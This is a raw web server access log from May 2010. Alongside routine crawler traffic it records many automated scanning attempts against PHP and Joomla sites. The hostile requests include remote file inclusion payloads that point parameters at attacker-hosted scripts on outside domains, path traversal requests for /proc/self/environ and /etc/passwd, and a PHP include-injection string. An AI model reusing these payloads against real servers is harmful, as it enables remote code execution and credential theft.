210.174.163.182 - - [15/May/2010:06:41:14 -0500] "GET /logs/lang_settings[0][1]=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 340 "-""libwww-perl/5.808"
114.108.151.149 - - [15/May/2010:06:41:15 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
65.75.54.32 - - [15/May/2010:06:43:07 -0500] "GET /logs/access_log.1217376000%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
207.46.13.94 - - [15/May/2010:06:43:39 -0500] "GET /logs/access_log.1214179200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
38.101.148.126 - - [15/May/2010:06:44:14 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:06:44:22 -0500] "GET /logs/access_log.1214524800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:06:44:28 -0500] "GET /logs/access_log.1235865600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
88.191.94.188 - - [15/May/2010:06:45:41 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:06:45:41 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:06:45:41 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:06:45:42 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:06:45:42 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:06:45:42 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:06:46:07 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:06:46:07 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
210.174.163.182 - - [15/May/2010:06:46:34 -0500] "GET //errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.808"
210.174.163.182 - - [15/May/2010:06:46:35 -0500] "GET /logs//errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.808"
88.191.94.188 - - [15/May/2010:06:47:01 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:06:47:01 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:06:47:01 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:06:47:06 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:06:47:06 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:06:47:06 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
87.250.255.243 - - [15/May/2010:06:47:57 -0500] "GET /logs/access_log.1256428800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
114.108.151.149 - - [15/May/2010:06:49:39 -0500] "GET /logs/access_log.1273276800%20/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
207.46.204.241 - - [15/May/2010:06:53:10 -0500] "GET /logs/access_log.1207785600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.151.149 - - [15/May/2010:06:55:48 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [15/May/2010:06:55:48 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [15/May/2010:06:57:21 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.250.255.243 - - [15/May/2010:06:59:38 -0500] "GET /logs/access_log.1165104000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.135 - - [15/May/2010:07:08:08 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.135 - - [15/May/2010:07:08:38 -0500] "GET /logs/access_log.1184112000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.151.149 - - [15/May/2010:07:09:42 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [15/May/2010:07:09:43 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.250.255.243 - - [15/May/2010:07:14:12 -0500] "GET /logs/access_log.1155513600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
210.174.163.182 - - [15/May/2010:07:15:32 -0500] "GET //errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.808"
210.174.163.182 - - [15/May/2010:07:15:32 -0500] "GET /logs//errors.php?error=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.808"
210.174.163.182 - - [15/May/2010:07:16:52 -0500] "GET //e404.php?DOCUMENT_ROOT=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.808"
210.174.163.182 - - [15/May/2010:07:16:52 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
207.46.199.38 - - [15/May/2010:07:20:09 -0500] "GET /logs/access_log.1199923200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.151.149 - - [15/May/2010:07:20:47 -0500] "GET /logs/access_log.1273276800/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [15/May/2010:07:20:48 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [15/May/2010:07:20:49 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.46.13.42 - - [15/May/2010:07:22:08 -0500] "GET /logs/access_log.1188864000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [15/May/2010:07:23:47 -0500] "GET /logs/access_log.1163462400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [15/May/2010:07:31:40 -0500] "GET /logs/access_log.1228176000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.87 - - [15/May/2010:07:36:09 -0500] "GET /logs/access_log.1205712000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.178 - - [15/May/2010:07:41:39 -0500] "GET /logs/access_log.1228089600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [15/May/2010:07:49:09 -0500] "GET /logs/access_log.1269216000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.45.186.2 - - [15/May/2010:07:50:52 -0500] "GET /logs/access_log.1273190400/index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
207.45.186.2 - - [15/May/2010:07:50:52 -0500] "GET /index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
207.45.186.2 - - [15/May/2010:07:50:52 -0500] "GET /logs/index2.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
211.115.213.158 - - [15/May/2010:07:52:30 -0500] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://incom-zarubezh.ru/tmp/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.115.213.158 - - [15/May/2010:07:52:30 -0500] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://incom-zarubezh.ru/tmp/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.115.213.158 - - [15/May/2010:07:52:33 -0500] "GET /logs/access_log.1272844800%20%20//com_bsq_sitestats/external/rssfeed.php?baseDir=http://incom-zarubezh.ru/tmp/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
207.46.199.50 - - [15/May/2010:07:52:39 -0500] "GET /logs/access_log.1186358400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.115.213.158 - - [15/May/2010:07:52:49 -0500] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://incom-zarubezh.ru/tmp/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.115.213.158 - - [15/May/2010:07:52:49 -0500] "GET /logs/access_log.1272844800%20%20//com_bsq_sitestats/external/rssfeed.php?baseDir=http://incom-zarubezh.ru/tmp/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
211.115.213.158 - - [15/May/2010:07:52:51 -0500] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://incom-zarubezh.ru/tmp/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.88.4.141 - - [15/May/2010:08:01:10 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.88.4.141 - - [15/May/2010:08:01:10 -0500] "GET /logs/access_log.1263859200//bemarket/postscript/postscript.php?p_mode=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
121.88.4.141 - - [15/May/2010:08:01:11 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
121.88.4.141 - - [15/May/2010:08:01:47 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.88.4.141 - - [15/May/2010:08:01:47 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
121.88.4.141 - - [15/May/2010:08:01:48 -0500] "GET /logs/access_log.1268956800%20%20//bemarket/postscript/postscript.php?p_mode=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
220.80.108.70 - - [15/May/2010:08:04:31 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
220.80.108.70 - - [15/May/2010:08:04:32 -0500] "GET /logs/access_log.1268956800%20%20//bemarket/postscript/postscript.php?p_mode=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
220.80.108.70 - - [15/May/2010:08:04:32 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
87.250.255.243 - - [15/May/2010:08:06:38 -0500] "GET /logs/access_log.1220572800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
88.191.94.188 - - [15/May/2010:08:13:05 -0500] "GET /logs//administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:08:13:05 -0500] "GET //administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:08:13:05 -0500] "GET /logs/access_log.1272844800//administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 382 "-""Mozilla/5.0"
124.0.74.195 - - [15/May/2010:08:14:15 -0500] "GET ///include/wysiwyg/spaw_control.class.php?spaw_root=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
124.0.74.195 - - [15/May/2010:08:14:15 -0500] "GET /logs/access_log.1232668800%20%20///include/wysiwyg/spaw_control.class.php?spaw_root=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
124.0.74.195 - - [15/May/2010:08:14:15 -0500] "GET /logs///include/wysiwyg/spaw_control.class.php?spaw_root=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
67.195.112.180 - - [15/May/2010:08:15:28 -0500] "GET /logs/access_log.1196380800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
38.101.148.126 - - [15/May/2010:08:15:30 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:08:15:42 -0500] "GET /logs/access_log.1262390400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:08:17:06 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:08:17:19 -0500] "GET /logs/access_log.1210550400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
67.195.112.180 - - [15/May/2010:08:19:14 -0500] "GET /logs/access_log.1217203200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.240 - - [15/May/2010:08:26:09 -0500] "GET /logs/access_log.1244332800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.5.163.207 - - [15/May/2010:08:28:21 -0500] "GET /logs///accounts/inc/include.php?language=0&lang_settings[0][1]=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
195.5.163.207 - - [15/May/2010:08:28:21 -0500] "GET ///accounts/inc/include.php?language=0&lang_settings[0][1]=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
204.152.200.50 - - [15/May/2010:08:28:21 -0500] "GET /logs//components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 328 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:08:28:21 -0500] "GET //components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.834"
87.250.255.243 - - [15/May/2010:08:29:56 -0500] "GET /logs/access_log.1205366400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
204.152.200.50 - - [15/May/2010:08:30:27 -0500] "GET /logs//components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 328 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:08:30:27 -0500] "GET //components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.834"
38.101.148.126 - - [15/May/2010:08:31:18 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:08:31:37 -0500] "GET /logs/access_log.1246492800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
87.252.3.230 - - [15/May/2010:08:35:23 -0500] "GET //errors.php?error=http://fedr.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.252.3.230 - - [15/May/2010:08:35:24 -0500] "GET /logs//errors.php?error=http://fedr.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
205.134.238.142 - - [15/May/2010:08:48:54 -0500] "GET //*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
38.101.148.126 - - [15/May/2010:08:50:51 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:08:51:04 -0500] "GET /logs/access_log.1255219200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
87.250.255.243 - - [15/May/2010:08:53:14 -0500] "GET /logs/access_log.1233360000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
205.134.238.142 - - [15/May/2010:08:53:14 -0500] "GET /logs/access_log.1273363200//*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 317 "-""libwww-perl/5.831"
205.134.238.142 - - [15/May/2010:08:53:15 -0500] "GET //*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
205.134.238.142 - - [15/May/2010:08:53:15 -0500] "GET /logs//*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
189.16.34.178 - - [15/May/2010:08:54:06 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://pixain.sitebr.net/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
189.16.34.178 - - [15/May/2010:08:54:06 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://pixain.sitebr.net/fx29id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
189.16.34.178 - - [15/May/2010:08:54:06 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://pixain.sitebr.net/fx29id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
207.46.199.54 - - [15/May/2010:08:57:09 -0500] "GET /logs/access_log.1191801600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
205.134.238.142 - - [15/May/2010:08:58:14 -0500] "GET /logs/access_log.1273190400//*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 317 "-""libwww-perl/5.831"
207.46.199.43 - - [15/May/2010:08:59:39 -0500] "GET /logs/access_log.1234915200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.251.189.206 - - [15/May/2010:09:04:42 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://pras.oxide.net.pl/scan/zfxidd2.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
213.251.189.206 - - [15/May/2010:09:04:42 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://pras.oxide.net.pl/scan/zfxidd2.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
213.251.189.206 - - [15/May/2010:09:04:42 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://pras.oxide.net.pl/scan/zfxidd2.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
38.101.148.126 - - [15/May/2010:09:07:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:09:07:18 -0500] "GET /logs/access_log.1244160000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
189.16.34.178 - - [15/May/2010:09:09:11 -0500] "GET /logs/access_log.1217376000%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://pixain.sitebr.net/fx29id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
38.101.148.126 - - [15/May/2010:09:10:39 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:09:11:00 -0500] "GET /logs/access_log.1226793600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
195.5.163.207 - - [15/May/2010:09:11:29 -0500] "GET /logs/access_log.1264032000//lib/connect.lib.php?g4[path]=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
195.5.163.207 - - [15/May/2010:09:11:29 -0500] "GET /logs//lib/connect.lib.php?g4[path]=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
195.5.163.207 - - [15/May/2010:09:11:29 -0500] "GET //lib/connect.lib.php?g4[path]=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
195.5.163.207 - - [15/May/2010:09:11:29 -0500] "GET /logs/access_log.1263427200//lib/connect.lib.php?g4[path]=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
208.115.111.248 - - [15/May/2010:09:18:57 -0500] "GET /?S=A HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [15/May/2010:09:18:59 -0500] "GET /logs/access_log.1225065600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [15/May/2010:09:19:02 -0500] "GET /logs/access_log.1247443200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [15/May/2010:09:19:04 -0500] "GET /logs/access_log.1251763200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
111.89.128.186 - - [15/May/2010:09:22:25 -0500] "GET //trans.php?trans=&p=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
111.89.128.186 - - [15/May/2010:09:22:25 -0500] "GET /logs//trans.php?trans=&p=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
210.174.163.182 - - [15/May/2010:09:22:59 -0500] "GET //trans.php?trans=ko&page=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
210.174.163.182 - - [15/May/2010:09:23:00 -0500] "GET /logs//trans.php?trans=ko&page=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
210.174.163.182 - - [15/May/2010:09:24:35 -0500] "GET //trans.php?trans=ko&page=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
210.174.163.182 - - [15/May/2010:09:24:35 -0500] "GET /logs//trans.php?trans=ko&page=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
38.101.148.126 - - [15/May/2010:09:26:09 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
87.250.255.243 - - [15/May/2010:09:26:46 -0500] "GET /logs/access_log.1217635200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
38.101.148.126 - - [15/May/2010:09:27:11 -0500] "GET /logs/access_log.1212883200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:09:27:27 -0500] "GET /logs/access_log.1215734400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
207.46.195.240 - - [15/May/2010:09:27:39 -0500] "GET /logs/access_log.1216512000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.48.202.44 - - [15/May/2010:09:28:11 -0500] "GET //trans.php?trans=eng&page=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
218.48.202.44 - - [15/May/2010:09:28:12 -0500] "GET /logs//trans.php?trans=eng&page=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
210.174.163.182 - - [15/May/2010:09:28:39 -0500] "GET //get_events.php?includedir=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
210.174.163.182 - - [15/May/2010:09:28:40 -0500] "GET /logs//get_events.php?includedir=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 304 "-""libwww-perl/5.808"
